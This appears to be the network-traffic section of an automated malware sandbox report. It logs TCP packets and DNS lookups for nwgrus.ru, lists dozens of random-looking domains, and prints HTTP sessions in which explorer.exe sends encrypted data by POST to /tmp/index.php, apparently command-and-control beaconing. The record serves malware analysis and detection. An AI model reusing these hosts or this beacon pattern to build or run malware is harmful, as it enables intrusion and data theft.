                              Oct 12, 2024 20:10:05.624042988 CEST6008980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:05.624172926 CEST6008980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:05.624182940 CEST6008980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:05.630160093 CEST8060089175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:05.631269932 CEST8060089175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:07.063302040 CEST8060089175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:07.063460112 CEST8060089175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:07.063550949 CEST6008980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:07.063620090 CEST6008980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:07.069400072 CEST8060089175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:10.426723003 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:10.431813002 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:10.431971073 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:10.432107925 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:10.432109118 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:10.438182116 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:10.438211918 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:11.869925022 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:11.870115042 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:11.870177031 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:11.870220900 CEST6009080192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:11.875686884 CEST8060090175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:16.228486061 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:16.442487955 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:16.442619085 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:16.442836046 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:16.442836046 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:16.447645903 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:16.447864056 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:17.906589985 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:17.910243034 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:17.910339117 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:17.917098045 CEST6009180192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:17.922075987 CEST8060091175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:22.248954058 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:22.254139900 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:22.254244089 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:22.254404068 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:22.254436016 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:22.259356022 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:22.259516001 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:23.702090025 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:23.702141047 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:23.702222109 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:23.702428102 CEST6009280192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:23.707254887 CEST8060092175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:28.951699972 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:28.956794977 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:28.956896067 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:28.957082033 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:28.957132101 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:28.962270021 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:28.962451935 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:30.352883101 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:30.353166103 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:30.353244066 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:30.353348970 CEST6009380192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:30.358401060 CEST8060093175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:34.681212902 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:34.773701906 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:34.773796082 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:34.773941040 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:34.773976088 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:34.778983116 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:34.779014111 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:36.229604006 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:36.229760885 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:36.229845047 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:36.231537104 CEST6009480192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:36.236427069 CEST8060094175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:40.189896107 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:40.195266962 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:40.195369005 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:40.195491076 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:40.195527077 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:40.200292110 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:40.200536013 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:41.630479097 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:41.630572081 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:41.630767107 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:41.630870104 CEST6009580192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:41.637284994 CEST8060095175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:44.928771019 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:44.934091091 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:44.934236050 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:44.934335947 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:44.934374094 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:44.939558029 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:44.939589977 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:46.361423016 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:46.361453056 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:46.361536980 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:46.361769915 CEST6009680192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:46.366588116 CEST8060096175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:50.236258030 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:50.241606951 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:50.241720915 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:50.241883039 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:50.241919041 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:50.247287035 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:50.247317076 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:51.683959961 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:51.684092999 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:51.684156895 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:51.684351921 CEST6009780192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:51.689147949 CEST8060097175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:55.437047005 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:55.442363977 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:55.442465067 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:55.442645073 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:55.442673922 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:55.447571993 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:55.447900057 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:56.903294086 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:56.903348923 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:10:56.903490067 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:56.903590918 CEST6009880192.168.2.5175.119.10.231
                              Oct 12, 2024 20:10:56.908699989 CEST8060098175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:01.748743057 CEST6009980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:11:02.606597900 CEST8060099175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:02.607084036 CEST6009980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:11:02.607198000 CEST6009980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:11:02.607198000 CEST6009980192.168.2.5175.119.10.231
                              Oct 12, 2024 20:11:02.612180948 CEST8060099175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:02.612289906 CEST8060099175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:04.022588015 CEST8060099175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:04.022815943 CEST8060099175.119.10.231192.168.2.5
                              Oct 12, 2024 20:11:04.022958994 CEST6009980192.168.2.5175.119.10.231
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 12, 2024 20:07:23.962045908 CEST5749653192.168.2.51.1.1.1
                              Oct 12, 2024 20:07:24.957123041 CEST5749653192.168.2.51.1.1.1
                              Oct 12, 2024 20:07:25.972798109 CEST5749653192.168.2.51.1.1.1
                              Oct 12, 2024 20:07:27.988540888 CEST5749653192.168.2.51.1.1.1
                              Oct 12, 2024 20:07:28.073901892 CEST53574961.1.1.1192.168.2.5
                              Oct 12, 2024 20:07:28.073935986 CEST53574961.1.1.1192.168.2.5
                              Oct 12, 2024 20:07:28.073944092 CEST53574961.1.1.1192.168.2.5
                              Oct 12, 2024 20:07:28.073951960 CEST53574961.1.1.1192.168.2.5
                              Oct 12, 2024 20:10:01.575406075 CEST5771853192.168.2.51.1.1.1
                              Oct 12, 2024 20:10:02.566796064 CEST5771853192.168.2.51.1.1.1
                              Oct 12, 2024 20:10:02.574071884 CEST53577181.1.1.1192.168.2.5
                              Oct 12, 2024 20:10:03.638221025 CEST53577181.1.1.1192.168.2.5
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Oct 12, 2024 20:07:23.962045908 CEST192.168.2.51.1.1.10xc35eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:24.957123041 CEST192.168.2.51.1.1.10xc35eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:25.972798109 CEST192.168.2.51.1.1.10xc35eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:27.988540888 CEST192.168.2.51.1.1.10xc35eStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:01.575406075 CEST192.168.2.51.1.1.10x37fcStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:02.566796064 CEST192.168.2.51.1.1.10x37fcStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.164.127.217A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru187.199.203.72A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073901892 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.164.127.217A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru187.199.203.72A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073935986 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.164.127.217A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru187.199.203.72A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073944092 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru119.204.11.2A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.164.127.217A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru187.199.203.72A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:07:28.073951960 CEST1.1.1.1192.168.2.50xc35eNo error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru200.45.93.45A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                              Oct 12, 2024 20:10:03.638221025 CEST1.1.1.1192.168.2.50x37fcNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                              • 23.145.40.164
                              • yilmrbbiqbh.com
                                • nwgrus.ru
                              • saaiglxgesx.net
                              • wmicpxlifessw.org
                              • vbthucuxeraia.com
                              • fhouqknummbbf.com
                              • onlnloemqmkdhio.com
                              • xrccmhuqkqkddsnr.net
                              • sgoujgwybxsges.org
                              • jousimacigldf.com
                              • sswxpvuufbvykyb.org
                              • cdinohvnolrheurg.com
                              • lifadhlvdwb.net
                              • ssfieliemcmj.org
                              • oigeugvvgtqexcr.com
                              • rscdgmrjlxccyebn.org
                              • jdrsrpxnderfeln.com
                              • letknxuqhdcyc.com
                              • wkvsglvqmchooeii.com
                              • liwpdohaxncmk.org
                              • brtyhhcwxjs.net
                              • ndcrdrvnqscc.com
                              • bsujsjkqxtjctly.net
                              • tkcyaumypyw.com
                              • vllrmfxybsdiplqu.com
                              • tamqyjusikafosy.net
                              • rtsymdwebcyefo.net
                              • cmpymujrwfied.org
                              • mlfyuywbsduqi.net
                              • xasjtfaqoixq.org
                              • fedsyouolon.com
                              • lbemhhdwkax.org
                              • tihslqvhibr.org
                              • vltcfypculmuiq.net
                              • emfnibhwebsi.net
                              • sawtavgcrgnnv.com
                              • ttpnojrymdictnko.com
                              • sdiwjkiticrn.com
                              • uedxkfpodrvnuu.net
                              • jmiqpftbbfl.net
                              • eguapsteeivf.com
                              • jmyhnxbsgfyxxpwc.com
                              • olbmmmarqkp.com
                              • hhxlvwfcbrqijpck.org
                              • stpaxqpyogea.org
                              • hvlkumwrcebxfc.org
                              • wuwimcitsicpgplo.net
                              • iqvctgowbce.com
                              • ranxxolmdknfcjg.org
                              • mqxuhbjviiy.com
                              • gbnguovvbpjawi.net
                              • bkopsfqneci.org
                              • ugrocofopkun.org
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549792119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:28.084242105 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://yilmrbbiqbh.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 353
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:28.084254980 CEST353OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 3f a6 86
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuM?X'x;,]Xuf]i+T+c;&TPm;mcd ti[?E)lSv#Ft=}8UxlfrHUX>
                              Oct 12, 2024 20:07:29.848795891 CEST152INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 04 00 00 00 72 e8 87 e8
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.549799119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:29.861692905 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://saaiglxgesx.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 328
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:29.861723900 CEST328OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 29 02 eb 92
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu)rq\;LDd1h>O_ew62'E<jI=4{MPz<Ex^W:SUZhXu[CYa]i O
                              Oct 12, 2024 20:07:31.374404907 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:31 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.549809119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:31.386056900 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://wmicpxlifessw.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 331
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:31.386091948 CEST331OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 78 58 e7 ae
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuxX|Nu4a<~bf?[C5;R3?:S@vb9E7.c .] XDltQ:#T}BiW;6@xR\
                              Oct 12, 2024 20:07:32.890898943 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:32 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
